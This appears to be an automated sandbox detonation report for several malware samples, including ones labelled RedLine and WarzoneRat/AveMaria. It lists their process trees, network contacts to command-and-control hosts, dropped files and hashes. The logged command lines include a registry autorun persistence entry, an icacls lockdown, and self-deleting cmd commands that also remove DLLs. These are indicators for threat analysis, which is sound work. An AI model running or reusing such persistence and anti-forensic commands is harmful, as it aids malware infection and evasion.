636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
"C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe"
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
"C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\system32\taskeng.exe
taskeng.exe {EF2636DA-2E7B-4604-BE1B-3AF3965780C7} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe --Task
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.2ip.ua | udp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 8.8.8.8:53 | securebiz.org | udp |
| N/A | 8.8.8.8:53 | astdg.top | udp |
| N/A | 14.51.96.70:80 | securebiz.org | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
| N/A | 8.8.8.8:53 | shpak125.tumblr.com | udp |
| N/A | 74.114.154.18:443 | shpak125.tumblr.com | tcp |
| N/A | 116.202.183.50:80 | 116.202.183.50 | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
Files
memory/1884-60-0x0000000000920000-0x0000000000A3B000-memory.dmp
memory/1264-61-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1264-62-0x0000000000424141-mapping.dmp
memory/1264-63-0x0000000075891000-0x0000000075893000-memory.dmp
memory/1264-64-0x0000000000400000-0x0000000000537000-memory.dmp
memory/540-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/1600-67-0x0000000000000000-mapping.dmp
memory/1124-69-0x0000000000424141-mapping.dmp
memory/1124-71-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | fd4ee296c73fb1ef0a18882b09ea6bd6 |
| SHA1 | 219be5079f0078fa1947cd44af24e9228acbd510 |
| SHA256 | e737e72814e28ecc563e852d9d8a6106cc2a6e6316a937ac79d399a5fdc88a96 |
| SHA512 | b3b8b77ce1ced729d4b4a4f4625fda2a2db7c8b663bad2fa2df61bea69d40a47240d4a69a73c87bdb12aa7fbb2443461343d01d783d122b173fee0917a2ba1a2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 5ff584af05cab237078a6630a50548fe |
| SHA1 | de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63 |
| SHA256 | a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac |
| SHA512 | 07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 55f8c8443bcbe807523f70450da13b67 |
| SHA1 | 274e3966fd2580d969e603f820e7a34b195d9057 |
| SHA256 | 450123c7fd6801816379ef956f24ea76cc59fa5b3f6f22e656fa986eac6a513f |
| SHA512 | f339c932f19553574c6e48c9d51a61df095f82c99a4a6eba169154152db42c2b2f7143f924f05b2a19bc6cb9e24101cf4400cfdd497ca85a94c0db65de37c670 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 38b33d357b48f05e2e68d4f8a1db047a |
| SHA1 | 8ce535f29afb1fa588d7152fcc59f35cefc987ba |
| SHA256 | 74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e |
| SHA512 | e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 2902de11e30dcc620b184e3bb0f0c1cb |
| SHA1 | 5d11d14a2558801a2688dc2d6dfad39ac294f222 |
| SHA256 | e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544 |
| SHA512 | efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9cdcfc1279958c9c3c36d77ceecb0937 |
| SHA1 | 9505016cd4dd6fb0caaca1ae7412d6037f8ae571 |
| SHA256 | c2726a39036b2c10e0f8acb9f04bfe8107c29c4d83c65c2724e84d8dd47b5af0 |
| SHA512 | 9d845a056f279eae9df86e4a795f0f4ea3bc5f0c47a7a736356ce152448a08f13cc0634506df5f392f671fce63742d3d147efe8293af97c7ece4edccf2ecdeb1 |
\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/1300-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/1740-83-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1740-84-0x000000000046B76D-mapping.dmp
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/1300-87-0x0000000001C50000-0x0000000001CEE000-memory.dmp
memory/1740-88-0x0000000000400000-0x00000000004A1000-memory.dmp
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
memory/1556-93-0x0000000000000000-mapping.dmp
memory/452-94-0x0000000000000000-mapping.dmp
memory/1400-95-0x0000000000000000-mapping.dmp
C:\ProgramData\softokn3.dll
| MD5 | a2ee53de9167bf0d6c019303b7ca84e5 |
| SHA1 | 2a3c737fa1157e8483815e98b666408a18c0db42 |
| SHA256 | 43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083 |
| SHA512 | 45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8 |
C:\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
C:\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
C:\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
C:\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
C:\ProgramData\freebl3.dll
| MD5 | ef2834ac4ee7d6724f255beaf527e635 |
| SHA1 | 5be8c1e73a21b49f353c2ecfa4108e43a883cb7b |
| SHA256 | a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba |
| SHA512 | c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2 |
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/1072-102-0x0000000000000000-mapping.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
149s
Max time network
158s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3256 set thread context of 3408 | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
"C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe"
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp |
Files
memory/3256-114-0x00000000003C0000-0x00000000003C1000-memory.dmp
memory/3256-116-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
memory/3256-117-0x0000000002710000-0x0000000002718000-memory.dmp
memory/3256-118-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/3256-119-0x0000000004C30000-0x0000000004C31000-memory.dmp
memory/3408-120-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3408-121-0x0000000000417E2A-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe.log
| MD5 | 7438b57da35c10c478469635b79e33e1 |
| SHA1 | 5ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5 |
| SHA256 | b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70 |
| SHA512 | 5887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a |
memory/3408-125-0x0000000005260000-0x0000000005261000-memory.dmp
memory/3408-126-0x0000000004C90000-0x0000000004C91000-memory.dmp
memory/3408-127-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
memory/3408-128-0x0000000004D30000-0x0000000004D31000-memory.dmp
memory/3408-129-0x0000000005000000-0x0000000005001000-memory.dmp
memory/3408-130-0x0000000004C50000-0x0000000005256000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
54s
Max time network
141s
Command Line
Signatures
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2760 set thread context of 2356 | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe |
| PID 3084 set thread context of 1364 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
"C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe"
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | dfdgdsasedw.ydns.eu | udp |
| N/A | 203.159.80.165:34566 | dfdgdsasedw.ydns.eu | tcp |
Files
memory/2760-114-0x0000000000310000-0x0000000000311000-memory.dmp
memory/2760-116-0x0000000005230000-0x0000000005231000-memory.dmp
memory/2760-117-0x0000000004C50000-0x0000000004C51000-memory.dmp
memory/2760-118-0x0000000004C00000-0x0000000004C01000-memory.dmp
memory/2760-119-0x0000000004D30000-0x000000000522E000-memory.dmp
memory/2760-120-0x0000000006C30000-0x0000000006C7E000-memory.dmp
memory/2760-121-0x0000000006D00000-0x0000000006D01000-memory.dmp
memory/2760-126-0x0000000008710000-0x0000000008777000-memory.dmp
memory/2760-127-0x00000000087A0000-0x00000000087A1000-memory.dmp
memory/2356-128-0x0000000000400000-0x000000000055E000-memory.dmp
memory/2356-129-0x0000000000405E28-mapping.dmp
memory/2760-130-0x0000000004D30000-0x000000000522E000-memory.dmp
memory/2356-131-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3412-132-0x0000000000000000-mapping.dmp
memory/3084-133-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
